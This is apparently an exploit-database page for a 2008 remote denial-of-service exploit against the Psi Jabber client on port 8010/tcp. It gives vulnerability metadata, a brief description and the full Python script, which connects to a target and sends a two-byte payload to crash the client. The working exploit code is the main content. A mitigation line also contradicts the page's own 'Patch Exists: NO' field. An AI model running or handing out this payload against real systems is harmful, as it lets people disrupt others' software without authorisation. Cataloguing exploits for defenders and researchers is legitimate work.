header-logo
Suggest Exploit
vendor:
psi jabber client
by:
sha0
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: psi jabber client
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2008

psi jabber client 8010/tcp remote denial of service (win & lin)

This exploit targets the psi jabber client running on port 8010/tcp. It sends a specific payload that causes the client to crash, resulting in a denial of service. The exploit works on both Windows and Linux systems. The exploit was created by sha0[at]badchecksum.net. More details can be found on the author's blog at http://jolmos.blogspot.com.

Mitigation:

To mitigate this vulnerability, it is recommended to disable or block access to the affected port (8010/tcp) or apply the latest patch from the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win & lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close() 

# milw0rm.com [2008-12-23]